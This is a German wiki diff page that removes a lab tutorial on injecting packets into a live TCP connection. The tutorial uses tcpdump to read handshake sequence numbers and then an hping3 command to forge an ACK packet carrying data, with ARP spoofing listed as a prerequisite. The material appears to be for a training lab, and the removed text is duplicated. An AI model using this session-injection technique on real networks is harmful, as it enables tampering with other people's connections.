Pakete in Verbindung schicken: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
(Die Seite wurde geleert.)
Markierung: Geleert
 
(26 dazwischenliegende Versionen desselben Benutzers werden nicht angezeigt)
Zeile 1: Zeile 1:
=Vorraussetzung=
 
*[[Arpspoofing mit Ettercap]]
 
=Versuchsaufbau=
 
*CLIENT=10.0.10.103
 
*OPFER=10.0.10.104
 
*ANGREIFER=10.0.10.101
 
*DSTPORT=2020
 
{{#drawio:hacking-1}}
 
  
=Angreifer=
 
;Auf Angreifer brauchen wir 2 Terminals
 
==Terminal 1==
 
;Variablen setzen
 
*CLIENT=10.0.10.103
 
*OPFER=10.0.10.104
 
*ANGREIFER=10.0.10.101
 
*DSTPORT=2020
 
 
==fenster client eins==
 
;tcpdump
 
cardassia ~ # tcpdump -ni lan  -S port 2020
 
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
 
listening on lan, link-type EN10MB (Ethernet), capture size 65535 bytes
 
==fenster client zwei==
 
;client
 
thomas.will@cardassia ~ $ nc 192.168.244.52  2020
 
==fenster client eins==
 
cardassia ~ # tcpdump -ni lan  -S port 2020
 
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
 
listening on lan, link-type EN10MB (Ethernet), capture size 65535 bytes
 
15:26:44.663526 IP 192.168.244.1.58257 > 192.168.244.52.2020: Flags [S], seq 1758983238, win 29200, options [mss 1460,sackOK,TS val 2268763 ecr 0,nop,wscale 7], length 0
 
15:26:44.663980 IP 192.168.244.52.2020 > 192.168.244.1.58257: Flags [S.], seq 963043879, ack 1758983239, win 28960, options [mss 1460,sackOK,TS val 193210349 ecr 2268763,nop,wscale 7], length 0
 
15:26:44.664035 IP 192.168.244.1.58257 > 192.168.244.52.2020: Flags [.], ack 963043880, win 229, options [nop,nop,TS val 2268763 ecr 193210349], length 0
 
==fenster client drei==
 
datei erstellen 10 bytes mit Umbruch
 
cardassia ~ # echo "hallo tux" > data.dat
 
cardassia ~ # hping3 -s 58257  -p 2020 -A -d 10 -E data.dat  -c 1 -M 1758983239 -L 963043880 192.168.244.52
 
 
=Links=
 
*https://www.rationallyparanoid.com/articles/hping.html
 
*http://www.eggdrop.ch/texts/hping/#2_1
 
*http://0daysecurity.com/articles/hping3_examples.html
 
*http://maintain-under-the-radar.org/index.php/security/terminologie/scannen-von-netzwerken
 
 
=Angreifer=
 
 
==fenster client eins==
 
;tcpdump
 
cardassia ~ # tcpdump -ni lan  -S port 2020
 
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
 
listening on lan, link-type EN10MB (Ethernet), capture size 65535 bytes
 
==fenster client zwei==
 
;client
 
thomas.will@cardassia ~ $ nc 192.168.244.52  2020
 
==fenster client eins==
 
cardassia ~ # tcpdump -ni lan  -S port 2020
 
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
 
listening on lan, link-type EN10MB (Ethernet), capture size 65535 bytes
 
15:26:44.663526 IP 192.168.244.1.58257 > 192.168.244.52.2020: Flags [S], seq 1758983238, win 29200, options [mss 1460,sackOK,TS val 2268763 ecr 0,nop,wscale 7], length 0
 
15:26:44.663980 IP 192.168.244.52.2020 > 192.168.244.1.58257: Flags [S.], seq 963043879, ack 1758983239, win 28960, options [mss 1460,sackOK,TS val 193210349 ecr 2268763,nop,wscale 7], length 0
 
15:26:44.664035 IP 192.168.244.1.58257 > 192.168.244.52.2020: Flags [.], ack 963043880, win 229, options [nop,nop,TS val 2268763 ecr 193210349], length 0
 
==fenster client drei==
 
datei erstellen 10 bytes mit Umbruch
 
cardassia ~ # echo "hallo tux" > data.dat
 
cardassia ~ # hping3 -s 58257  -p 2020 -A -d 10 -E data.dat  -c 1 -M 1758983239 -L 963043880 192.168.244.52
 
 
=Links=
 
*https://www.rationallyparanoid.com/articles/hping.html
 
*http://www.eggdrop.ch/texts/hping/#2_1
 
*http://0daysecurity.com/articles/hping3_examples.html
 
*http://maintain-under-the-radar.org/index.php/security/terminologie/scannen-von-netzwerken
 

Aktuelle Version vom 5. Juli 2021, 13:51 Uhr